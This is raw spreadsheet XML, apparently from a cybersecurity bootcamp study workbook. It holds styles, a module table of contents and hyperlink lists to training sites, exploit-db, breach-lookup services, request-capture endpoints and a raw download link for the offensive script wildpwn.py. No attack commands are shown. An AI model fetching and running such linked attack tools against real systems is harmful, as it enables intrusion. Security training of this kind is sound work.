    </xf>
    <xf borderId="0" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="11" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="34" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="35" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="17" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="30" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="22" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="36" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="18" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="16" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="37" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="38" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="39" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="11" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle xfId="0" name="Normal" builtinId="0"/>
  </cellStyles>
  <dxfs count="9">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theme="1"/>
          <bgColor theme="1"/>
        </patternFill>
      </fill>
      <border/>
    </dxf>
    <dxf>
      <font/>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFB7E1CD"/>
          <bgColor rgb="FFB7E1CD"/>
        </patternFill>
      </fill>
      <border/>
    </dxf>
    <dxf>
      <font/>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF6D9EEB"/>
          <bgColor rgb="FF6D9EEB"/>
        </patternFill>
      </fill>
      <border/>
    </dxf>
    <dxf>
      <font/>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFC27BA0"/>
          <bgColor rgb="FFC27BA0"/>
        </patternFill>
      </fill>
      <border/>
    </dxf>
    <dxf>
      <font/>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFE6B8AF"/>
          <bgColor rgb="FFE6B8AF"/>
        </patternFill>
      </fill>
      <border/>
    </dxf>
    <dxf>
      <font/>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFE599"/>
          <bgColor rgb="FFFFE599"/>
        </patternFill>
      </fill>
      <border/>
    </dxf>
  </dxfs>
  <tableStyles count="1">
    <tableStyle count="3" pivot="0" name="Table of Contents-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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet4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2562225</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>85725</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="247650" cy="1905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0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="190500" cy="2000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6" displayName="Table_1" id="1">
  <tableColumns count="2">
    <tableColumn name="Table of Contents (Use the             icon in the SheetsPanel to navigate)" id="1"/>
    <tableColumn name="Additional Content" id="2"/>
  </tableColumns>
  <tableStyleInfo name="Table of Conten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ns1.dns.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://marketing.widgets.com/" TargetMode="External"/><Relationship Id="rId3"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hodan.io/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0001/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://paymentsgoogle.bogusdomain.com/" TargetMode="External"/><Relationship Id="rId4"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google.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google.com/" TargetMode="External"/><Relationship Id="rId3"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sans.org/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mimo.org/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.securecodewarrior.com/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thec2matrix.com/matrix" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://avatao.com/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://leakcheck.io/en" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/spreadsheets/d/1gyQTCGccR9ZCGkqAhxtPVV4sbPWAEqOYOk6BMWee-1Q/edit" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dvwa.co.uk/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hacksplaining.com/lessons" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hacker101.com/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://whatsmyname.app/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dehashed.com/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyber.gov.au/threats/types-threats/malware" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybrary.it/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecuritydegrees.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elearnsecurity.com/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hack.me/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackthissite.org/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hack.me/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://overthewire.org/wargames/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hackertest.net/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wechall.net/active_sites" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://captf.com/practice-ctf/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackthebox.com/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mitre-attack.github.io/attack-navigator/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://overthewire.org/wargames/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.org/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybernews.com/best-password-managers/most-common-passwords/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.amanhardikar.com/mindmaps/PracticeUrls.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whatismyip.com/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctfd.io/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit-exercises.com/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://trailofbits.github.io/ctf/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing3.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tutorials.cyberaces.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.opensecuritytraining.info/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sindresorhus/awesome" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://teachingsecurity.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/controls/cis-controls-list" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://teachcyber.tk/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackmes.one/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyber.gov.au/learn-basics" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digtvbg.com/files/books-for-hacking/Web%20Hacking%20101%20-%20How%20to%20Make%20Money%20Hacking%20Ethically%20by%20Peter%20Yaworski.pdf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pwn.college/"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filename.sh/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.sh/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.sh/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posthere.io/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.sh/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posthere.io/6b5b-4983-9ab3" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://httpbin.org/anything" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posthere.io/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.sh/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.sh/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wildpwn.py/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.sh/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.sh/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/localh0t/wildpwn/master/wildpwn.py" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wildpwn.py/" TargetMode="External"/><Relationship Id="rId18"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sans.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://keyfromshodan.io/" TargetMode="External"/><Relationship Id="rId3"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google.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google.com/" TargetMode="External"/><Relationship Id="rId3"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hyperlink" Target="http://test.py/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://filename.py/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://test.py/" TargetMode="External"/><Relationship Id="rId4"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hyperlink" Target="https://mitre-attack.github.io/attack-navigator/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whatismyip.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.db-fiddle.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://crt.sh/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dehashed.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crt.sh/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shodan.io/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://leakcheck.io/en" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://whatsmyname.app/" TargetMode="Externa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zdnet.com/article/cisa-solarwinds-hackers-also-used-password-guessing-to-breach-targets/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cbsnews.com/philadelphia/news/mgm-caesars-hacked-data-breach-cyber-attack-atlantic-city-borgata-update/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.9news.com.au/national/optus-hack-ceo-claims-no-victims-of-crime-since-cyber-attack/7caf3b88-2aea-4a72-acaf-676ccc1cf198"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cols>
    <col customWidth="1" min="1" max="1" width="61.5"/>
    <col customWidth="1" min="2" max="2" width="48.88"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="3" t="s">
        <v>2</v>
      </c>
      <c r="B2" s="4" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="3" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="3" t="s">
        <v>6</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="3" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="s">
        <v>12</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="7" t="s">
        <v>14</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="9" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="8" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="9" t="s">
        <v>18</v>
      </c>
      <c r="B10" s="8" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="9" t="s">
        <v>20</v>
      </c>
      <c r="B11" s="8" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="9" t="s">
        <v>22</v>
      </c>
      <c r="B12" s="8" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="9" t="s">
        <v>24</v>
      </c>
      <c r="B13" s="8" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="9" t="s">
        <v>26</v>
      </c>
      <c r="B14" s="8" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="9" t="s">
        <v>28</v>
      </c>
      <c r="B15" s="8" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="9" t="s">
        <v>30</v>
      </c>
      <c r="B16" s="8" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="9" t="s">
        <v>32</v>
      </c>
      <c r="B17" s="10"/>
    </row>
    <row r="18">
      <c r="A18" s="9" t="s">
        <v>33</v>
      </c>
      <c r="B18" s="10"/>
    </row>
    <row r="19">
      <c r="A19" s="9" t="s">
        <v>34</v>
      </c>
      <c r="B19" s="10"/>
    </row>
    <row r="20">
      <c r="A20" s="9" t="s">
        <v>35</v>
      </c>
      <c r="B20" s="11" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="9" t="s">
        <v>37</v>
      </c>
      <c r="B21" s="12" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="9" t="s">
        <v>39</v>
      </c>
      <c r="B22" s="12" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="9" t="s">
        <v>41</v>
      </c>
      <c r="B23" s="13"/>
    </row>
    <row r="24">
      <c r="A24" s="9" t="s">
        <v>42</v>
      </c>
      <c r="B24" s="13"/>
    </row>
    <row r="25">
      <c r="A25" s="9" t="s">
        <v>43</v>
      </c>
      <c r="B25" s="13"/>
    </row>
    <row r="26">
      <c r="A26" s="14" t="s">
        <v>44</v>
      </c>
      <c r="B26" s="15"/>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink display="Acronyms" location="Acronyms!A1" ref="A2"/>
    <hyperlink display="Vulnerabilities" location="Vulnerabilities!A1" ref="B2"/>
    <hyperlink display="Educational Resources" location="'Educational Resources'!A1" ref="A3"/>
    <hyperlink display="Procedures" location="Procedures!A1" ref="B3"/>
    <hyperlink display="Tools" location="Tools!A1" ref="A4"/>
    <hyperlink display="Attacks &amp; Mitigations" location="'Attacks and Mitigations'!A1" ref="B4"/>
    <hyperlink display="TCP/UDP Common Ports" location="'TCPUDP Common Ports'!A1" ref="A5"/>
    <hyperlink display="Advantages vs Disadvantages" location="'Advantages vs Disadvantages'!A1" ref="B5"/>
    <hyperlink display="Famous Breaches" location="'Famous Breaches'!A1" ref="A6"/>
    <hyperlink display="Comparisons" location="Comparisons!A1" ref="B6"/>
    <hyperlink display="Module 1: Cybersecurity 101" location="'M1 Cybersecurity 101'!A1" ref="A8"/>
    <hyperlink display="Bash (Linux) Command Base" location="'Debian (Linux) Command Base'!A1" ref="B8"/>
    <hyperlink display="Module 2: Governance Risk and Compliance" location="'M2 Governance Risk and Complian'!A1" ref="A9"/>
    <hyperlink display="Kali (Linux) Command Base" location="'Kali (Linux) Command Base'!A1" ref="B9"/>
    <hyperlink display="Module 3: Terminal and Bash" location="'M3 Terminal and Bash'!A1" ref="A10"/>
    <hyperlink display="PowerShell (Windows) Command Base" location="'Powershell (Windows) Command Ba'!A1" ref="B10"/>
    <hyperlink display="Module 4: Linux-SysAdmin-Fundamentals" location="'M4 Linux-SysAdmin-Fundamentals'!A1" ref="A11"/>
    <hyperlink display="Python Command Base" location="'Python Command Base'!A1" ref="B11"/>
    <hyperlink display="Module 5: Archiving and Logging Data" location="'M5 Archiving and Logging Data'!A1" ref="A12"/>
    <hyperlink display="Wireshark Command Base" location="'Wireshark Command Base'!A1" ref="B12"/>
    <hyperlink display="Module 6: Bash Scripting and Programming" location="'M6 Bash Scripting and Programmi'!A1" ref="A13"/>
    <hyperlink display="Metasploit Command Base" location="'Metasploit Command Base'!A1" ref="B13"/>
    <hyperlink display="Module 7: Windows Administration and Hardening" location="'M7 Windows Administration and H'!A1" ref="A14"/>
    <hyperlink display="SQL Command Base" location="'SQL Command Base'!A1" ref="B14"/>
    <hyperlink display="Module 8: Networking Fundamentals" location="'M8 Networking Fundamentals'!A1" ref="A15"/>
    <hyperlink display="XSS Command Base" location="'XSS Command Base'!A1" ref="B15"/>
    <hyperlink display="Module 9: Networking Fundamentals II and CTF" location="'M9 Networking Fundamentals II a'!A1" ref="A16"/>
    <hyperlink display="Google Dorks Command Base" location="'Google Dork Command Base'!A1" ref="B16"/>
    <hyperlink display="Module 10: Cryptography" location="'M10 Cryptography'!A1" ref="A17"/>
    <hyperlink display="Module 11: Network Security" location="'M11 Network Security'!A1" ref="A18"/>
    <hyperlink display="Module 12: Web Development" location="'M12 Web Development'!A1" ref="A19"/>
    <hyperlink display="Module 13: Cloud Computing" location="'M13 Cloud Computing'!A1" ref="A20"/>
    <hyperlink display="Module 14: Project 1" location="'M14 Project 1'!A1" ref="A21"/>
    <hyperlink display="TryHackMe Definitions" location="'TryHackMe Definitions'!A1" ref="B21"/>
    <hyperlink display="Module 15: Web Vulnerabilities and Hardening" location="'M15 Web Vulnerabilities and Har'!A1" ref="A22"/>
    <hyperlink display="ISC - CC" location="'ISC2 - CC'!A1" ref="B22"/>
    <hyperlink display="Module 16 &amp; 17: Pentesting" location="'M16 &amp; 17 Pentesting'!A1" ref="A23"/>
    <hyperlink display="Module 19 &amp; 20: SIEM " location="'M19 &amp; 20 SIEM'!A1" ref="A24"/>
    <hyperlink display="Module 21: Digital Forensics" location="'M21 Digital Forensics'!A1" ref="A25"/>
    <hyperlink display="Module 23: Prep Week / Certs" location="'M23 Prep Week  Cert'!A1" ref="A26"/>
  </hyperlinks>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31.25"/>
    <col customWidth="1" min="2" max="2" width="90.88"/>
    <col customWidth="1" min="3" max="3" width="29.88"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="16" t="s">
        <v>1174</v>
      </c>
      <c r="B1" s="17" t="s">
        <v>624</v>
      </c>
      <c r="C1" s="17" t="s">
        <v>1175</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="72" t="s">
        <v>1411</v>
      </c>
      <c r="B2" s="19" t="s">
        <v>1412</v>
      </c>
      <c r="C2" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="72" t="s">
        <v>1414</v>
      </c>
      <c r="B3" s="20" t="s">
        <v>1415</v>
      </c>
      <c r="C3" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="72" t="s">
        <v>1416</v>
      </c>
      <c r="B4" s="19" t="s">
        <v>1417</v>
      </c>
      <c r="C4" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="72" t="s">
        <v>1418</v>
      </c>
      <c r="B5" s="20" t="s">
        <v>1419</v>
      </c>
      <c r="C5" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="72" t="s">
        <v>1420</v>
      </c>
      <c r="B6" s="19" t="s">
        <v>1421</v>
      </c>
      <c r="C6" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="72" t="s">
        <v>1422</v>
      </c>
      <c r="B7" s="20" t="s">
        <v>1423</v>
      </c>
      <c r="C7" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="72" t="s">
        <v>1424</v>
      </c>
      <c r="B8" s="19" t="s">
        <v>1425</v>
      </c>
      <c r="C8" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="72" t="s">
        <v>1426</v>
      </c>
      <c r="B9" s="20" t="s">
        <v>1427</v>
      </c>
      <c r="C9" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="72" t="s">
        <v>1428</v>
      </c>
      <c r="B10" s="19" t="s">
        <v>1429</v>
      </c>
      <c r="C10" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="72" t="s">
        <v>1430</v>
      </c>
      <c r="B11" s="20" t="s">
        <v>1431</v>
      </c>
      <c r="C11" s="80" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="72" t="s">
        <v>1432</v>
      </c>
      <c r="B12" s="19" t="s">
